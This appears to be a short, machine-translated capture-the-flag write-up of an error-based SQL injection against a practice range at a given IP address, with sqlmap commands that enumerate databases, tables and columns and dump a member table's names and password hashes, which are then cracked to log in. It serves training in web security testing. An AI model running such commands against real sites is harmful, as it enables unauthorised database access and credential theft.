Moher College - SQL injection vulnerability test (error reporting and blind note)

Preface

This article is for technical discussion only , Study , Do not use for illegal purposes , It has nothing to do with me to use it for illegal purposes ！

First, get to the shooting range and review the questions , It is obvious that it is an error injection

Visit the target after getting the range

Click... Under user login Notice on platform shutdown and maintenance

Click to find url by  http://124.70.71.251:46004/new_list.php?id=1

An error is reported after trying to add a single quotation mark , Discovery database is mariaDB

  Got it injection point , direct sqlmap Just a shuttle

Blast the name of the warehouse

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 --dbs

Name of Pop Watch

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup --tables

Pop field name

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member --columns

detonation name and password The content of

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member -C name,password --dump

  Decrypt   md5 Online decryption ,md5 Decryption encryption

  Finally, you can log in and get flag